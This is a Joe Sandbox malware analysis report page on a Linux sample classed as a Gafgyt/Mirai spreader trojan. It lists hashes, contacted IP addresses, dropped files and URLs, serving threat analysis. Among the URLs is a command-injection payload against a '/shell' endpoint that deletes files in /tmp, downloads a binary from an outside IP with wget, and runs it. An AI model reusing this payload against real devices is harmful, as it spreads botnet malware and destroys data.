nSg5RM0w0d

Status: finished

Submission Time: 2022-01-14 23:48:18 +01:00

Malicious

Spreader

Trojan

Gafgyt Mirai

Comments

Details

Analysis ID:
553468
API (Web) ID:
920988
Analysis Started:

2022-01-15 00:09:55 +01:00
Analysis Finished:

2022-01-15 00:16:33 +01:00
MD5:
5ba84075b6789440e97cb6095ad55c32
SHA1:
19c16b64b5482561db39de26034459274b9dfb91
SHA256:
65222b0aa3c9aa64a92d8c4aa20e664ff6a7049c8b70dac73d85794407a32ded
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

Third Party Analysis Engines

malicious

Score: 24/43

IPs

IP	Country	Detection
67.254.189.11	United States
83.20.191.39	Poland
148.221.102.35	Mexico
Click to see the 97 hidden entries
223.124.158.166	China
47.171.224.192	United States
118.212.117.45	China
216.54.175.15	United States
194.28.179.220	Ukraine
101.32.48.92	China
192.243.129.200	United States
103.123.2.193	Taiwan; Republic of China (ROC)
67.220.186.99	United States
190.76.228.209	Venezuela
199.107.217.174	United States
46.190.17.103	Greece
34.61.9.98	United States
200.95.19.78	Mexico
169.199.161.126	United States
147.110.180.178	South Africa
52.94.98.4	United States
133.232.125.48	Japan
80.60.82.221	Netherlands
121.227.88.55	China
68.58.216.220	United States
54.233.11.252	United States
130.51.4.50	Reserved
132.39.33.228	United States
47.87.41.215	United States
123.79.119.67	China
69.65.111.10	United States
67.46.64.246	United States
182.184.108.188	Pakistan
185.240.220.152	Czech Republic
63.240.110.192	United States
163.5.177.186	France
166.76.52.137	United States
139.140.222.34	United States
62.20.16.13	Sweden
192.141.163.66	Brazil
71.104.168.123	United States
95.221.124.215	Russian Federation
41.110.164.253	Algeria
185.118.141.131	Turkey
90.119.126.11	France
9.196.70.214	United States
138.241.60.27	United States
112.94.220.109	China
86.182.64.238	United Kingdom
146.104.244.64	Netherlands
1.128.184.34	Australia
169.37.91.35	Switzerland
87.236.77.16	France
38.21.173.197	United States
40.15.158.90	United States
63.58.17.229	United States
98.228.221.112	United States
70.230.219.247	United States
43.205.251.248	Japan
5.166.10.58	Russian Federation
167.179.151.167	Australia
190.10.105.51	Costa Rica
88.16.182.166	Spain
125.53.105.82	Japan
146.122.54.110	United States
131.251.226.21	United Kingdom
88.245.81.179	Turkey
104.214.224.221	United States
52.49.15.231	United States
50.114.10.124	United States
168.225.157.89	United States
73.105.34.11	United States
106.216.185.226	India
155.95.85.169	United States
76.72.131.87	United States
82.237.229.86	France
99.136.89.88	United States
86.75.124.223	France
94.54.78.131	Turkey
139.113.193.20	Norway
213.110.25.60	Russian Federation
186.195.5.248	Brazil
156.215.141.86	Egypt
52.84.92.177	United States
182.189.25.137	Pakistan
134.209.44.112	United States
114.118.210.232	China
142.224.201.64	Canada
206.63.232.245	United States
82.125.79.157	France
163.8.122.9	Australia
120.80.62.97	China
110.244.101.120	China
139.193.211.227	Indonesia
17.157.3.229	United States
69.212.49.41	United States
113.112.4.109	China
143.142.32.104	United States
95.36.119.231	Netherlands
85.122.137.62	Romania
189.39.227.49	Brazil

Domains

Name	IP	Detection
daisy.ubuntu.com	162.213.33.132

URLs

Name	Detection
https://www.rsyslog.com
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws

Dropped files

Name	File Type	Hashes
/run/systemd/seats/.#seat0Cld9nQ	ASCII text	#
/run/utmp	data	#
/run/user/1000/pulse/pid	ASCII text	#
Click to see the 97 hidden entries
/run/systemd/users/.#127yZpFSO	ASCII text	#
/run/systemd/users/.#127yCudpO	ASCII text	#
/run/systemd/users/.#127osndWP	ASCII text	#
/run/systemd/users/.#127JxP4nS	ASCII text	#
/run/systemd/users/.#1279T6QuP	ASCII text	#
/run/systemd/seats/.#seat0vOH8GW	ASCII text	#
/run/systemd/seats/.#seat0gW22XI	ASCII text	#
/run/systemd/seats/.#seat0fPuBS5	ASCII text	#
/run/systemd/seats/.#seat0UP3koV	ASCII text	#
/run/systemd/seats/.#seat0PGcmbf	ASCII text	#
/var/cache/man/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/run/systemd/seats/.#seat00fP9dO	ASCII text	#
/run/systemd/journal/streams/.#9:83229oJt8zp	ASCII text	#
/run/systemd/journal/streams/.#9:83132oMUTyp	ASCII text	#
/run/systemd/journal/streams/.#9:831209JNtqn	ASCII text	#
/run/systemd/journal/streams/.#9:83119epQaxo	ASCII text	#
/run/systemd/journal/streams/.#9:83106BcFoap	ASCII text	#
/run/systemd/journal/streams/.#9:83021OcrCqd	ASCII text	#
/run/systemd/journal/streams/.#9:82652M5jDnn	ASCII text	#
/run/systemd/journal/streams/.#9:82651Incshm	ASCII text	#
/run/systemd/journal/streams/.#9:82282x4gkdd	ASCII text	#
/run/systemd/journal/streams/.#9:82281sw8yuf	ASCII text	#
/var/cache/man/fr.ISO8859-1/index.db.oO9WYa	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/ja/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/it/index.db.OyRu9a	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/it/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/index.db.EUDhwa	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/id/index.db.Zd40Sd	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/id/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/hu/index.db.yksjkd	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/hu/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fr/index.db.sUR25d	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fr/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fr.UTF-8/index.db.Y4hA8c	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fr.UTF-8/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/run/systemd/journal/streams/.#9:82280Xpi0tf	ASCII text	#
/var/cache/man/fr.ISO8859-1/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fi/index.db.WVQHwc	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fi/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/es/index.db.cn8Gbb	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/es/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/de/index.db.S3TEtc	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/de/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/da/index.db.77D2Mb	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/da/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/cs/index.db.bmsf99	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/cs/5237	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/run/systemd/journal/streams/.#9:76811qH7pMy	ASCII text	#
/run/systemd/journal/streams/.#9:77767hdajY5	ASCII text	#
/run/systemd/journal/streams/.#9:77751uetbi3	ASCII text	#
/run/systemd/journal/streams/.#9:77736zKgEu3	ASCII text	#
/run/systemd/journal/streams/.#9:77735JHXZJ4	ASCII text	#
/run/systemd/journal/streams/.#9:77734UpxPL4	ASCII text	#
/run/systemd/journal/streams/.#9:77386zbV07x	ASCII text	#
/run/systemd/journal/streams/.#9:773819KFhnz	ASCII text	#
/run/systemd/journal/streams/.#9:77350SauDfx	ASCII text	#
/run/systemd/journal/streams/.#9:77349IVOduw	ASCII text	#
/run/systemd/journal/streams/.#9:77322OsWbkA	ASCII text	#
/run/systemd/journal/streams/.#9:76990m2l7zx	ASCII text	#
/run/systemd/journal/streams/.#9:76939jGjApA	ASCII text	#
/run/systemd/journal/streams/.#9:77786au6FZ5	ASCII text	#
/run/systemd/journal/streams/.#9:76810F4S0kw	ASCII text	#
/run/systemd/journal/streams/.#9:76798vzf3xx	ASCII text	#
/run/systemd/journal/streams/.#9:76694UkHCiz	ASCII text	#
/run/systemd/journal/streams/.#9:75969qyDlHy	ASCII text	#
/run/systemd/journal/streams/.#9:75722SiuR1v	ASCII text	#
/run/systemd/journal/streams/.#9:75719FgcSNy	ASCII text	#
/run/systemd/journal/streams/.#9:75514O1H8Qy	ASCII text	#
/run/systemd/journal/streams/.#9:75513yTxkyw	ASCII text	#
/run/gdm3.pid	ASCII text	#
/proc/5530/oom_score_adj	very short file (no magic)	#
/home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source	ASCII text	#
/run/systemd/journal/streams/.#9:80225Kko1GH	ASCII text	#
/run/systemd/journal/streams/.#9:82200Mmg8de	ASCII text	#
/run/systemd/journal/streams/.#9:81419DgoJHw	ASCII text	#
/run/systemd/journal/streams/.#9:81410JMEOZv	ASCII text	#
/run/systemd/journal/streams/.#9:80895csWzRe	ASCII text	#
/run/systemd/journal/streams/.#9:80890kXpEjc	ASCII text	#
/run/systemd/journal/streams/.#9:80889vcC1wb	ASCII text	#
/run/systemd/journal/streams/.#9:8087408eiNb	ASCII text	#
/run/systemd/journal/streams/.#9:80872ZsDYad	ASCII text	#
/run/systemd/journal/streams/.#9:80768PNEHie	ASCII text	#
/run/systemd/journal/streams/.#9:80766R2Khpf	ASCII text	#
/run/systemd/journal/streams/.#9:80227tRyzgH	ASCII text	#
/run/systemd/journal/streams/.#9:80226gFRKaF	ASCII text	#
/home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink	ASCII text	#
/run/systemd/journal/streams/.#9:80210crg9BE	ASCII text	#
/run/systemd/journal/streams/.#9:802066GpLmH	ASCII text	#
/run/systemd/journal/streams/.#9:80205eJNuYE	ASCII text	#
/run/systemd/journal/streams/.#9:80204BgANnG	ASCII text	#
/run/systemd/journal/streams/.#9:80203qa2yGF	ASCII text	#
/run/systemd/journal/streams/.#9:80202TiclRI	ASCII text	#
/run/systemd/journal/streams/.#9:80201A3MprE	ASCII text	#
/run/systemd/journal/streams/.#9:80198tlEzBH	ASCII text	#
/run/systemd/journal/streams/.#9:77841sR2tbA	ASCII text	#
/run/systemd/journal/streams/.#9:77790f7UV12	ASCII text	#
/run/systemd/journal/streams/.#9:77789HrwWM2	ASCII text	#

nSg5RM0w0d

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

nSg5RM0w0d Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Search started

nSg5RM0w0d